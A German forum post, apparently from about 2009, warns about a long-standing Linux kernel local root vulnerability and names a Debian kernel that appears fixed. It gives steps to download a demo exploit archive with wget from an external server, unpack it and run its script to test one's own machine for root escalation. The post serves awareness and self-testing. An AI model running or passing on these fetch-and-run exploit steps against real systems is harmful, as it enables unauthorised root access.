Hallo zusammen,
ist zwar schon gut zwei Wochen her, dass das groß rauskam...
Im Linux-Kernel klafft seit 2001 eine Lücke, die ist so groß wie ein Mondkrater!
Mit wirklich einfachen Mitteln können sich normale User zum root befordern und entsprechend auch mit root-Rechten Befehle ausführen wie z.B. den Server herunterfahren, Dateien löschen, Passwortdatei lesen...
Und das ist nicht unbedingt auf die Konsole beschränkt, wer z.B. CGI-Scripte auf einem Webserver ausführen darf und selber hochladen kann, wäre damit in der Lage, Befehle als root auszuführen.
Den technisch vollwertigen Artikel gibt es hier:
http://www.heise.de/security/Kritisc...meldung/143515
Wer sein (eigenes!!!) System testen will, ob es anfällig ist oder nicht, der kann diesen Demo-Exploit verwenden:
http://grsecurity.net/~spender/wunderbar_emporium.tgz
Wie geht das:
- Wichtig: Man darf natürlich nicht als root an der Konsole angemeldet sein
- wget http://grsecurity.net/~spender/wunderbar_emporium.tgz
- entpacken mit ' tar -xvzf wunderbar_emporium.tgz '
- dann ins Verzeichnis wunderbar_emporium wechseln
- und die ./wunderbar_emporium.sh ausführen
Im Erfolgsfall sieht es so ähnlich aus wie hier auf dieser Testmaschine mit 2.6.18er-Kernel:
Wer Debian Etch verwendet, kann den etchnhalf-Kernel in Version 2.6.24 benutzen, der scheint gefixt zu sein - zumindest funktionierte der Exploit darauf nicht.
Btw: Wer einen vServer mit einer exploitablen Kernel-Version benutzt, kann sehr wahrscheinlich den Kernel nicht selber updaten, da dieser durch den Hypervisor geladen wird. In diesem Fall sollte man vielleicht mal den Hoster darauf aufmerksam machen
Max
Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
LinkBack URL
About LinkBacks
Zitieren